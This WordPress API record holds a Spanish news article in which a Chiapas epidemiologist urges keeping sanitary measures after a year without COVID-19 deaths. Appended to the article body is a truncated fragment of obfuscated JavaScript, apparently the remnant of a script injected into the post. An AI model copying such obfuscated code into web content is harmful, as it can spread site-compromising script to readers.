{"id":8839,"date":"2023-02-27T01:28:47","date_gmt":"2023-02-27T01:28:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8839"},"modified":"2023-02-27T01:28:48","modified_gmt":"2023-02-27T01:28:48","slug":"necesario-preservar-medidas-sanitarias-para-evitar-riesgos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8839","title":{"rendered":"Necesario preservar medidas sanitarias para evitar riesgos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"403\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677461242054.jpg\" alt=\"\" class=\"wp-image-8840\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677461242054.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677461242054-300x168.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores<br>26 de febrero del 2023. Tuxtla Guti\u00e9rrez.- James G\u00f3mez Montes, epidemi\u00f3logo Chiapaneco, expuso que, a pesar de que ese ha cumplido un a\u00f1o sin defunciones por Covid-19, la poblaci\u00f3n debe guardar las medias sanitarias para evitar cualquier tipo de riesgo.<br>La Secretar\u00eda de Salud, dio a conocer en d\u00edas recientes, que se cumpli\u00f3 un a\u00f1o en esta entidad, que no se han registrado defunciones por Covid-19, lo que resulta positivo.<br>Los expertos en este tema, afirman que, la pandemia por SARS-CoV2, causante de Covid-19, les dej\u00f3 grandes ense\u00f1anzas y los cuidados se deben mantener.<br>El epidemi\u00f3logo sostuvo que, compa\u00f1eros allegados profesionales de la salud perecieron al frente de la primera l\u00ednea de batalla, situaci\u00f3n muy lamentable.<br>Con la llegada de las vacunas, los casos disminuyeron y actualmente se cumplieron m\u00e1s de 365 d\u00edas sin muertes, pero tambi\u00e9n el experto afirm\u00f3 que \u00e9sta no ser\u00e1 la \u00faltima pandemia que viva la humanidad.<br>Es por ello necesario no bajar la guardia, estar siempre pendientes de los h\u00e1bitos nuevos que dej\u00f3 la pandemia, en el cuidado personal pero tambi\u00e9n de las personas que est\u00e1n a nuestro alrededor.<br>&#8220;Nos deja una enorme experiencia, el Covid es una de las enfermedades que se engloban dentro del grupo de enfermedades emergentes, es decir de repente aparecen y aprender de todo lo que en el momento est\u00e1 sucediendo\u201d, puntualiz\u00f3.<br>Destac\u00f3, que la pandemia evidenci\u00f3 las carencias en los diferentes sectores, como el de salud y el educativo, donde la poblaci\u00f3n ha tenido que afrontar grandes retos.<br>\u201cLos chiapanecos, tenemos que ser precavidos, las enfermedades, las pandemias surgen de manera repentina, la ense\u00f1anza debe ser una respuesta m\u00e1s adecuada, ser emp\u00e1ticos, resilentes conscientes de la fragilidad de nuestra salud\u201d, coment\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores26 de febrero del 2023. Tuxtla Guti\u00e9rrez.- James G\u00f3mez Montes, epidemi\u00f3logo Chiapaneco, expuso que, a pesar de que ese ha cumplido un a\u00f1o sin defunciones por Covid-19, la poblaci\u00f3n debe guardar las medias sanitarias para evitar cualquier tipo de riesgo.La Secretar\u00eda de Salud, dio a conocer en d\u00edas recientes, que se cumpli\u00f3 un a\u00f1o &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8839","post","type-post","status-publish","format-standard","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8839","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8839"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8839\/revisions"}],"predecessor-version":[{"id":8841,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8839\/revisions\/8841"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8839"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}